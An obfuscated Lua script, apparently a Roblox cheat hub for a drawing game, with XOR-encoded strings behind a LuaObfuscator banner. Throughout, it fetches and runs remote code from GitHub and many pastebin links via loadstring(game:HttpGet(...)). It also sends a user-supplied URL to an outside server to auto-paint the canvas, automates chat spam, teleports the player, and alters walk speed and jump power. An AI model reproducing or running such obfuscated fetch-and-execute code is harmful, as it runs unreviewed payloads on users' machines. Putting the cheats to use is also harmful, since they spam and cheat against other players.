--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1 )),v1(v2(v10,1 + (v12% #v10) ,1 + (v12% #v10) + 1 )))%256 ));end return v5(v11);end local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/MaGiXxScripter0/keysystemv2api/master/ui/xrer_mstudio45.lua"))();v8.New({[v7("\240\211\203\41\239\184\198\10\216\204\213\11\231\182\194","\126\177\163\187\69\134\219\167")]=v7("\7\200\39\202\242\42\206\2\208\254","\156\67\173\74\165"),[v7("\26\182\68\19","\38\84\215\41\118\220\70")]=v7("\116\19\47\29\240\89\21\98\58\235\82\86\4\32\219\117\86\20\55\204\99\63\13\60","\158\48\118\66\114"),[v7("\130\42\22\57","\155\203\68\112\86\19\197")]=v7("\97\216\34\188\75\125\252\184\64\210\36\188\85\107\224\184\82\213\51\188\83\123\247\241\86\201\37\189","\152\38\189\86\156\32\24\133"),[v7("\216\94\180\69\243\69\163\111\242\65\174\82\249","\38\156\55\199")]="https://discord.gg/QWwfTJ5sTB"});repeat task.wait();until v8.Finished() or v8.Closed  if (v8.Finished() and (v8.Closed==false)) then local v13=loadstring(game:HttpGet("https://raw.githubusercontent.com/dawid-scripts/UI-Libs/main/Vape.txt"))();local v14=v13:Window(v7("\140\120\113\39\29\125\249\3\128\72\94\104\53\102\255\70\232\75\50","\35\200\29\28\72\115\20\154"),Color3.fromRGB(10 + 31 ,12,12),Enum.KeyCode.RightControl);local v15=v14:Tab(v7("\56\173\197\204\205\11\49\23\186\195\222\153\35\38","\84\121\223\177\191\237\76"));local v16=v14:Tab(v7("\154\67\221\175\122\125\53\210\168\87\206\165\41","\161\219\54\169\192\90\48\80"));local v17=v14:Tab(v7("\106\77\13\40\92\76\9\49\80","\69\41\34\96"));local v18=v14:Tab(v7("\136\198\219\15\18\36\174\215\196","\75\220\163\183\106\98"));local v19=v14:Tab(v7("\50\182\138\46\220\16","\185\98\218\235\87"));local v20=v14:Tab(v7("\232\46\34\226\215\190\216","\202\171\92\71\134\190"));local v21="";v15:Textbox(v7("\0\204\45\143\44\129\25\154\37\129\5\134\57\212\56","\232\73\161\76"),true,function(v28)_G.Url=v28;end);v15:Button(v7("\156\220\76\88\12\186\205\71\29\63\169\205","\126\219\185\34\61"),function(v29)local v30=0 -0 ;local v31;while true do if (v30==0) then v31=game:GetService(v7("\36\218\74\98\77\114\225\241\5\205\91","\135\108\174\62\18\30\23\147")):JSONDecode(game:HttpGet("https://test-bot.bordeevann09.repl.co/convert?url="   .. tostring(_G.Url) ));if  not v31.error then for v116,v117 in pairs(v31) do game.Players.LocalPlayer.PlayerGui.MainGui.PaintFrame.GridHolder.Grid[v116].BackgroundColor3=Color3.fromRGB(v117[1 -0 ],v117[1 + 1 ],v117[3 -0 ]);end else warn(v31.error);end break;end end end);v15:Button(v7("\147\231\43\201\20\171\115\146\187\224\36\139\44\167\62\194\164","\167\214\137\74\171\120\206\83"),function()local v32=0;local v33;local v34;local v35;while true do if (v32==(807 -(118 + 688))) then repeat local v94=48 -(25 + 23) ;while true do if (v94==(0 + 0)) then v33.Text=string.format(v7("\206\160\96\89\162\226\219\162\54","\199\235\144\82\61\152"),v34,v35);if (v35==(1886 -(927 + 959))) then local v129=0 -0 ;while true do if (v129==0) then v35=792 -(16 + 716) ;v34=v34-1 ;break;end end end v94=1;end if (v94==(1 -0)) then v35=v35-(98 -(11 + 86)) ;wait(2 -1 );break;end end until (v34==(285 -(175 + 110))) and (v35==(0 -0))  v33.Text=v7("\53\19\184\47\30\86\173\36\71\5\172\41\10\31\173","\75\103\118\217");break;end if (v32==0) then v33=game.Players.LocalPlayer.PlayerGui.MainGui.PaintFrame.NextButton.Label;v34,v35=24 -19 ,1796 -(503 + 1293) ;v32=2 -1 ;end end end);v15:Dropdown(v7("\245\85\126\16\182\19\135\115\117\26\188\12\198\64\127\6","\126\167\52\16\116\217"),{v7("\250\47\46\132\187\20\188\233\32\41\141\181\21\239\136\15\50\148\167","\156\168\78\64\224\212\121"),v7("\53\239\171\202\8\227\229\239\9\231\168\203\71\207\183\218\20","\174\103\142\197"),v7("\100\41\81\60\42\83\184\122\41\81\60\54\93\249\70\45\76\120\4\76\236\69","\152\54\72\63\88\69\62")},function(v36)local v37=require(game:GetService(v7("\228\200\239\69\209\214\253","\60\180\164\142")).LocalPlayer.PlayerScripts.Core.Notification);local v38=game:GetService(v7("\104\82\4\48\34\255\1","\114\56\62\101\73\71\141")).LocalPlayer.PlayerGui.MainGui.NotificationFrame;function Notify(v65,v66,v67)local v68=0;local v69;while true do if ((1 + 2)==v68) then v69:Disconnect();v69=nil;break;end if ((0 + 0)==v68) then if  not v65 then return;end if  not v66 then return v37:Update(tostring(v65));end v68=1;end if (v68==(534 -(43 + 490))) then local v95=0;while true do if ((734 -(711 + 22))==v95) then v68=2;break;end if ((0 -0)==v95) then if (type(v66)==v7("\171\253\201\205\182\238","\164\216\137\187")) then if string.find(v66,"#") then v66=v66:gsub("#","");end v66=Color3.fromHex(v66);end if (type(v67)==v7("\193\242\35\187\168\249","\107\178\134\81\210\198\158")) then local v130=859 -(240 + 619) ;while true do if (v130==0) then if string.find(v67,"#") then v67=v67:gsub("#","");end v67=Color3.fromHex(v67);break;end end end v95=1;end end end if (v68==(1 + 1)) then local v96=0 -0 ;while true do if (v96==(0 + 0)) then v69=v38.ChildAdded:Connect(function(v126)if ((v126.Name==v7("\20\1\133","\202\88\110\226\166")) and v126:FindFirstChild(v7("\246\38\177\227\216\204\4\135","\170\163\111\226\151"))) then v126.TextColor3=v66 or Color3.fromRGB(1999 -(1344 + 400) ,215,422 -(255 + 150) ) ;v126.UIStroke.Color=v67 or Color3.fromRGB(131 + 35 ,75 + 65 ,81 -62 ) ;end end);v37:Update(tostring(v65));v96=3 -2 ;end if (v96==1) then v68=1742 -(404 + 1335) ;break;end end end end end Notify(v7("\48\34\166\120\105\50\39\20\34\179\44\75\51\105\52\62\184\55\87\118","\73\113\80\210\88\46\87"),v7("\194\123\152\66\227\209\40","\135\225\76\173\114"),v7("\89\189\232\224\252\237\247","\199\122\141\216\208\204\221"));if (v36==v7("\159\220\30\244\119\251\237\252\30\249\117\243\237\252\2\228\107","\150\205\189\112\144\24")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/Important/main/Coems",true))();elseif (v36==v7("\23\133\177\72\11\133\81\49\43\141\178\77\8\155\81\49\55\144\172","\112\69\228\223\44\100\232\113")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/NOBRO/main/W",true))();elseif (v36==v7("\230\30\9\215\185\113\198\248\30\9\215\165\127\135\196\26\20\147\151\110\146\199","\230\180\127\103\179\214\28")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/Important2/main/Coems2",true))();end end);v15:Dropdown(v7("\165\11\76\82\229\79\244\204\36\77\82\247","\128\236\101\63\38\132\33"),{v7("\139\187\30\81\178\228\193","\175\204\201\113\36\214\139"),v7("\106\201\34\232\19\72","\100\39\172\85\188"),v7("\138\113\171\129\39\164\118\184","\83\205\24\217\224"),v7("\197\202\193\50\245\214\204\49\166\241\196\41\231\203\141\13\231\215\217\125\183","\93\134\165\173"),v7("\157\253\205\205\41\221\179\114\254\198\200\214\59\192\242\78\191\224\213\130\104","\30\222\146\161\162\90\174\210"),v7("\195\65\98\15\246\90","\106\133\46\16"),v7("\111\41\127\248\26\97\86\41\126\253\86","\32\56\64\19\156\58"),v7("\120\205\228\67\78\251\134\79\196\165\119\72\230","\224\58\168\133\54\58\146"),v7("\114\95\89\255\108","\107\57\54\43\157\21\230\231"),v7("\235\138\5\231\176\223\196","\175\187\235\113\149\217\188"),v7("\18\166\143\70\226\126\119\124\157\132\72","\24\92\207\225\44\131\25"),v7("\111\193\185\75\20\115\66\199\189","\29\43\179\216\44\123"),v7("\144\216\42\69\179\153\1\66\185\203\47\69\185\153\114\29","\44\221\185\64"),v7("\50\226\77\84","\19\97\135\40\63"),v7("\158\89\61\53\38\38\167\79\54","\81\206\60\83\91\79"),v7("\108\170\210\107\111\231\95\165\73\164\222","\196\46\203\176\18\79\163\45"),v7("\155\55\124\17\42\254","\143\216\66\30\126\68\155"),v7("\137\218\8\206\213\166\197","\129\202\168\109\171\165\195\183"),v7("\10\89\37\202\199\84\214\45\76\50\202","\134\66\56\87\184\190\116"),v7("\17\56\5\190\10\171\12\58\46\48\5\190\10","\85\92\81\105\219\121\139\65"),v7("\213\188\93\64\110\208","\191\157\211\48\37\28")},function(v39)local v40=require(game:GetService(v7("\239\19\245\5\63\205\12","\90\191\127\148\124")).LocalPlayer.PlayerScripts.Core.Notification);local v41=game:GetService(v7("\72\139\47\14\125\149\61","\119\24\231\78")).LocalPlayer.PlayerGui.MainGui.NotificationFrame;function Notify(v70,v71,v72)if  not v70 then return;end if  not v71 then return v40:Update(tostring(v70));end if (type(v71)==v7("\145\57\183\67\210\71","\113\226\77\197\42\188\32")) then if string.find(v71,"#") then v71=v71:gsub("#","");end v71=Color3.fromHex(v71);end if (type(v72)==v7("\41\2\230\188\52\17","\213\90\118\148")) then local v92=0;while true do if ((0 -0)==v92) then if string.find(v72,"#") then v72=v72:gsub("#","");end v72=Color3.fromHex(v72);break;end end end local v73=v41.ChildAdded:Connect(function(v87)if ((v87.Name==v7("\119\33\179","\45\59\78\212\54")) and v87:FindFirstChild(v7("\37\127\176\159\148\33\166\245","\144\112\54\227\235\230\78\205"))) then v87.TextColor3=v71 or Color3.fromRGB(244 + 11 ,8 + 207 ,8 + 9 ) ;v87.UIStroke.Color=v72 or Color3.fromRGB(433 -267 ,87 + 53 ,19) ;end end);v40:Update(tostring(v70));v73:Disconnect();v73=nil;end Notify(v7("\146\58\27\188\247\94\189\45\29\253\196\94\183\104\60\201\243\120\150\27\60\189","\59\211\72\111\156\176"),v7("\13\208\182\125\74\215\231","\77\46\231\131"),v7("\249\4\230\16\234\4\230","\32\218\52\214"));if (v39==v7("\105\5\62\189\245\191\75","\58\46\119\81\200\145\208\37")) then loadstring(game:HttpGet("https://pastebin.com/raw/nY1gJLEq",true))();elseif (v39==v7("\6\137\39\152\190\178","\86\75\236\80\204\201\221")) then loadstring(game:HttpGet("https://pastebin.com/raw/SwYFztPp",true))();elseif (v39==v7("\85\72\101\132\234\130\124\64","\235\18\33\23\229\158")) then loadstring(game:HttpGet("https://pastebin.com/raw/0fwnPkDz",true))();elseif (v39==v7("\115\181\205\180\67\169\192\183\16\142\200\175\81\180\129\139\81\168\213\251\1","\219\48\218\161")) then loadstring(game:HttpGet("https://pastebin.com/raw/CXS40nVS",true))();elseif (v39==v7("\199\126\112\70\200\92\225\232\49\72\64\207\78\238\164\65\125\91\207\15\178","\128\132\17\28\41\187\47")) then loadstring(game:HttpGet("https://pastebin.com/raw/sctr82QQ",true))();elseif (v39==v7("\39\61\20\63\78\21","\61\97\82\102\90")) then loadstring(game:HttpGet("https://pastebin.com/raw/aJnmRN6b",true))();elseif (v39==v7("\155\39\167\79\135\118\16\0\161\47\167","\105\204\78\203\43\167\55\126")) then loadstring(game:HttpGet("https://pastebin.com/raw/aDBj0etp",true))();elseif (v39==v7("\135\175\34\11\7\13\193\68\169\234\2\12\7","\49\197\202\67\126\115\100\167")) then loadstring(game:HttpGet("https://pastebin.com/raw/ZkazKZRq",true))();elseif (v39==v7("\28\82\205\43\153","\62\87\59\191\73\224\54")) then loadstring(game:HttpGet("https://pastebin.com/raw/PjbdfHYN",true))();elseif (v39==v7("\215\3\238\219\238\1\241","\169\135\98\154")) then loadstring(game:HttpGet("https://pastebin.com/raw/cuvVjQjp",true))();elseif (v39==v7("\229\126\42\94\252\52\199\139\69\33\80","\168\171\23\68\52\157\83")) then loadstring(game:HttpGet("https://pastebin.com/raw/0Fd9Az64",true))();elseif (v39==v7("\208\99\244\170\42\35\142\224\116","\231\148\17\149\205\69\77")) then loadstring(game:HttpGet("https://pastebin.com/raw/Crfubqd4",true))();elseif (v39==v7("\173\166\205\242\89\191\161\169\195\233\88\246\132\231\149\170","\159\224\199\167\155\55")) then loadstring(game:HttpGet("https://pastebin.com/raw/7tHiw718",true))();elseif (v39==v7("\196\246\57\217","\178\151\147\92")) then loadstring(game:HttpGet("https://pastebin.com/raw/E8fHACKF",true))();elseif (v39==v7("\188\248\66\60\27\91\115\159\248","\26\236\157\44\82\114\44")) then loadstring(game:HttpGet("https://pastebin.com/raw/js9KqAZY",true))();elseif (v39==v7("\8\47\215\66\106\10\199\90\45\33\219","\59\74\78\181")) then loadstring(game:HttpGet("https://pastebin.com/raw/vmmQsU0N",true))();elseif (v39==v7("\6\196\88\85\189\32","\211\69\177\58\58")) then loadstring(game:HttpGet("https://pastebin.com/raw/u05d04Cx",true))();elseif (v39==v7("\148\247\124\240\249\206\165","\171\215\133\25\149\137")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/Daddy-dad/main/Coems%20baby",true))();elseif (v39==v7("\201\201\32\232\246\112\204\77\245\205\32","\34\129\168\82\154\143\80\156")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/Daddy/main/Dad",true))();elseif (v39==v7("\168\187\63\14\91\14\164\138\160\50\7\77\93","\233\229\210\83\107\40\46")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/Coemssjsns/main/Daddybro",true))();elseif (v39==v7("\233\77\63\211\23\206","\101\161\34\82\182")) then loadstring(game:HttpGet("https://raw.githubusercontent.com/Alan0947383/DadSponso/main/Coems",true))();end end);_G.AutoMessages=false;local v22=1169 -(645 + 522) ;local v23=1800 -(1010 + 780) ;local function v24(v42)local v43=0;local v44;local v45;while true do if (v43==(1 + 0)) then game:GetService(v7("\12\58\233\253\55\60\248\229\59\59\202\229\49\45\248\246\59","\145\94\95\153")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(v44,v45);break;end if ((0 -0)==v43) then v44=v42;v45=v7("\201\1\85","\78\136\109\57\158\187\130\226");v43=2 -1 ;end end end local v25={};v16:Textbox(v7("\208\200\7\198\79\176\248\141\32\208\86\163\238","\215\157\173\116\181\46"),true,function(v46)table.insert(v25,v46);end);v16:Textbox(v7("\2\181\130\230\154\1\189\134\247\154\125\135\142\241\213\59\176\152\187","\186\85\212\235\146"),true,function(v47)v22=tonumber(v47) or v22 ;v23=v22 * (1838 -(1045 + 791)) ;end);v16:Toggle(v7("\231\143\23\252\53\235\24\227\148\2\241\121\195\93\209\146\23\249\60\253","\56\162\225\118\158\89\142"),false,function(v48)local v49=0 -0 ;while true do if (v49==0) then _G.AutoMessages=v48;if v48 then local v112=0 -0 ;local v113;local v114;while true do if (v112==2) then while _G.AutoMessages do local v131=0;local v132;local v133;while true do if (v131==(506 -(351 + 154))) then while true do if (v132==(1574 -(1281 + 293))) then v133=math.random(v22,v23);print(v7("\195\172\191\192\161\88\94\180\171\185\198\232","\57\148\205\214\180\200\54")   .. v133   .. v7("\82\238\48\55\121\28\249\38\122\56\92","\22\114\157\85\84") );v132=267 -(28 + 238) ;end if (v132==(2 -1)) then wait(v133);v24(v25[math.random(1560 -(1381 + 178) , #v25)]);break;end end break;end if (v131==(0 + 0)) then v132=0 + 0 ;v133=nil;v131=1 + 0 ;end end end break;end if (v112==(0 -0)) then v113=require(game:GetService(v7("\108\9\193\182\39\202\79","\184\60\101\160\207\66")).LocalPlayer.PlayerScripts.Core.Notification);v114=game:GetService(v7("\1\142\125\165\52\144\111","\220\81\226\28")).LocalPlayer.PlayerGui.MainGui.NotificationFrame;v112=1;end if (v112==1) then local v128=0;while true do if (v128==(0 + 0)) then function Notify(v140,v141,v142)local v143=470 -(381 + 89) ;local v144;while true do if (v143==(0 + 0)) then local v145=0;while true do if (v145==0) then if  not v140 then return;end if  not v141 then return v113:Update(tostring(v140));end v145=1 + 0 ;end if (v145==(1 -0)) then v143=1157 -(1074 + 82) ;break;end end end if (v143==(1 -0)) then if (type(v141)==v7("\0\193\144\242\228\192","\167\115\181\226\155\138")) then if string.find(v141,"#") then v141=v141:gsub("#","");end v141=Color3.fromHex(v141);end if (type(v142)==v7("\241\54\245\85\117\118","\166\130\66\135\60\27\17")) then local v147=1784 -(214 + 1570) ;while true do if (v147==(1455 -(990 + 465))) then if string.find(v142,"#") then v142=v142:gsub("#","");end v142=Color3.fromHex(v142);break;end end end v143=1 + 1 ;end if (v143==(2 + 1)) then v144:Disconnect();v144=nil;break;end if (v143==(2 + 0)) then v144=v114.ChildAdded:Connect(function(v146)if ((v146.Name==v7("\104\69\201","\80\36\42\174\21")) and v146:FindFirstChild(v7("\123\57\4\110\92\31\60\127","\26\46\112\87"))) then local v148=0 -0 ;while true do if (v148==0) then v146.TextColor3=v141 or Color3.fromRGB(1981 -(1668 + 58) ,215,643 -(512 + 114) ) ;v146.UIStroke.Color=v142 or Color3.fromRGB(166,365 -225 ,38 -19 ) ;break;end end end end);v113:Update(tostring(v140));v143=10 -7 ;end end end Notify(v7("\152\54\191\123\255\146\64\167\170\34\172\113\255\151\68\167\249\16\191\117\173\171\64\176\248","\212\217\67\203\20\223\223\37"),v7("\249\218\253\130\190\221\172","\178\218\237\200"),v7("\245\229\182\128\230\229\182","\176\214\213\134"));v128=1 + 0 ;end if (v128==1) then v112=2;break;end end end end end break;end end end);v17:Dropdown(v7("\234\196\1\201\92\250\232\229\217\7\215\29\217\174\132\232\28\201\80\227\166\205\223\10\132\102\196\141\229\231\58\247\105\223\139\132\234\33\240\110\203","\200\164\171\115\164\61\150"),{v7("\141\245\23\74\145\171","\227\222\148\99\37"),v7("\27\87\64\249\185\30\83\92","\153\83\50\50\150"),v7("\122\121\120\9\81\167\88\88","\45\61\22\19\124\19\203"),v7("\230\29\6\224\32\124\172\196\64","\217\161\114\109\149\98\16"),v7("\57\33\51\125\175\124\27\96\29\101\185","\20\114\64\88\28\220"),v7("\19\14\192\187\235","\221\81\97\178\212\152\176"),v7("\230\238\15\242\14\194","\122\173\135\125\155"),v7("\162\205\1\170\55\113\231\130\129\35\182\50\56\203","\168\228\161\96\217\95\81"),v7("\252\222\37\73\111\98\210","\55\187\177\78\60\79"),v7("\30\207\75\228\84\218\192\8\215\90","\224\77\174\63\139\38\175")},function(v50)local v51=0;local v52;local v53;while true do if (v51==0) then v52=require(game:GetService(v7("\180\77\89\55\129\83\75","\78\228\33\56")).LocalPlayer.PlayerScripts.Core.Notification);v53=game:GetService(v7("\254\114\179\26\128\220\109","\229\174\30\210\99")).LocalPlayer.PlayerGui.MainGui.NotificationFrame;v51=827 -(802 + 24) ;end if (v51==(1 -0)) then function Notify(v99,v100,v101)if  not v99 then return;end if  not v100 then return v52:Update(tostring(v99));end if (type(v100)==v7("\8\249\148\88\227\58","\89\123\141\230\49\141\93")) then if string.find(v100,"#") then v100=v100:gsub("#","");end v100=Color3.fromHex(v100);end if (type(v101)==v7("\224\101\228\5\30\77","\42\147\17\150\108\112")) then if string.find(v101,"#") then v101=v101:gsub("#","");end v101=Color3.fromHex(v101);end local v102=v53.ChildAdded:Connect(function(v115)if ((v115.Name==v7("\35\169\42","\136\111\198\77\31\135")) and v115:FindFirstChild(v7("\55\32\148\66\175\235\28\172","\201\98\105\199\54\221\132\119"))) then local v120=0 -0 ;while true do if (0==v120) then v115.TextColor3=v100 or Color3.fromRGB(38 + 217 ,166 + 49 ,17) ;v115.UIStroke.Color=v101 or Color3.fromRGB(28 + 138 ,31 + 109 ,52 -33 ) ;break;end end end end);v52:Update(tostring(v99));v102:Disconnect();v102=nil;end Notify(v7("\152\30\151\97\37\48\162\188\30\130\53\7\49\236\138\57\160\2\39\6\159\248","\204\217\108\227\65\98\85"),v7("\29\148\160\181\40\144\90","\160\62\163\149\133\76"),v7("\149\240\93\127\147\134\240","\163\182\192\109\79"));v51=2;end if (v51==2) then if (v50==v7("\7\39\20\207\231\33","\149\84\70\96\160")) then loadstring(game:HttpGet("https://pastebin.com/raw/gV9q0rYi",true))();elseif (v50==v7("\16\3\31\226\120\43\12\227","\141\88\102\109")) then loadstring(game:HttpGet("https://pastebin.com/raw/miH5Hvhs",true))();elseif (v50==v7("\148\92\193\101\56\49\64\196","\161\211\51\170\16\122\93\53")) then loadstring(game:HttpGet("https://pastebin.com/raw/iaRiJNTY",true))();elseif (v50==v7("\220\161\185\61\217\162\167\45\169","\72\155\206\210")) then loadstring(game:HttpGet("https://pastebin.com/raw/QAzJ6wzQ",true))();elseif (v50==v7("\109\123\95\15\32\78\115\20\43\42\67","\83\38\26\52\110")) then loadstring(game:HttpGet("https://pastebin.com/raw/64H2Kz1e",true))();elseif (v50==v7("\122\24\53\73\75","\38\56\119\71")) then loadstring(game:HttpGet("https://pastebin.com/raw/YKpmKnde",true))();elseif (v50==v7("\216\230\74\223\49\89","\54\147\143\56\182\69")) then loadstring(game:HttpGet("https://pastebin.com/raw/LcYp6rG0",true))();elseif (v50==v7("\240\141\254\90\215\150\174\249\9\252\217\140\246\74","\191\182\225\159\41")) then loadstring(game:HttpGet("https://pastebin.com/raw/EAdRK0Bu",true))();elseif (v50==v7("\12\29\35\64\203\178\203","\162\75\114\72\53\235\231")) then loadstring(game:HttpGet("https://pastebin.com/raw/ZkjGfryM",true))();elseif (v50==v7("\191\61\80\237\65\23\204\25\93\231","\98\236\92\36\130\51")) then loadstring(game:HttpGet("https://pastebin.com/raw/tMNjVre2",true))();end break;end end end);v18:Button(v7("\129\31\10\191\70\188\166\112\133\23\8\250\99\186\180\61\161\10","\80\196\121\108\218\37\200\213"),function(v54)local v55=0 -0 ;while true do if (v55==(0 + 0)) then function TeleportToCoordinates(v103,v104,v105)local v106=0 + 0 ;local v107;local v108;while true do if ((0 + 0)==v106) then v107=game.Players.LocalPlayer;v108=v107.Character.HumanoidRootPart;v106=1 + 0 ;end if (v106==1) then v108.CFrame=CFrame.new(v103,v104,v105);break;end end end TeleportToCoordinates(15 + 16 , -(1436 -(797 + 636)),77 -61 );break;end end end);v18:Button(v7("\44\122\15\118\95\11\142\64\86\4\121\78\13\158\19\51\35\113\79\78\172\18\114\15\122\88\78\185\8\124\18","\234\96\19\98\31\43\110"),function(v56)function TeleportToCoordinates(v74,v75,v76)local v77=1619 -(1427 + 192) ;local v78;local v79;while true do if (v77==0) then v78=game.Players.LocalPlayer;v79=v78.Character.HumanoidRootPart;v77=1 + 0 ;end if (1==v77) then v79.CFrame=CFrame.new(v74,v75,v76);break;end end end TeleportToCoordinates( -171,6 -3 , -(8 + 0));end);v18:Button(v7("\43\10\65\194\185\127","\235\102\127\50\167\204\18"),function(v57)function TeleportToCoordinates(v80,v81,v82)local v83=0;local v84;local v85;local v86;while true do if (v83==(1 + 0)) then v86=nil;while true do if (v84==(326 -(192 + 134))) then local v124=1276 -(316 + 960) ;while true do if (v124==1) then v84=1;break;end if (0==v124) then v85=game.Players.LocalPlayer;v86=v85.Character.HumanoidRootPart;v124=1 + 0 ;end end end if (v84==1) then v86.CFrame=CFrame.new(v80,v81,v82);break;end end break;end if (v83==(0 + 0)) then v84=0 + 0 ;v85=nil;v83=3 -2 ;end end end TeleportToCoordinates(274,559 -(83 + 468) , -(1817 -(1202 + 604)));end);local v26=v19:Textbox(v7("\122\180\248\51\116\33\71\164\231","\78\48\193\149\67\36"),true,function(v58)local v59=tonumber(v58);if v59 then game.Players.LocalPlayer.Character.Humanoid.JumpPower=v59;end end);local v27=v19:Textbox(v7("\7\31\140\19\114\32\27\133\28","\33\80\126\224\120"),true,function(v60)local v61=tonumber(v60);if v61 then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v61;end end);v20:Button(v7("\207\186\6\192\85\248\187\89","\60\140\200\99\164"),function(v62)print(v7("\179\237\68\21\173\199\217\17\37\170\199\192\11\102\131\139\248\68\1\183\158\231","\194\231\148\100\70"));end);v20:Button(v7("\98\73\215\166\250\199\80\73\197\227\212\209\6\77\205\162\248\153\23\77\198\172\181\144\18\27\148\227\215\198\66\12\242\179\249\198\85\67","\168\38\44\161\195\150"),function(v63)print(v7("\163\243\135\123\35","\118\224\156\226\22\80\136\214"));end);v20:Button(v7("\100\235\88\148\87\252\92\147\2\202\92\150\2\198\92\140\82\235\75\192\96\247\25\147\82\225\87\147\77\254\88\146\76\225\75\132\84\254\87\195\21\189\15\208","\224\34\142\57"),function(v64)print("W");end);else print(v7("\251\181\215\210\97","\110\190\199\165\189\19\145\61"));end
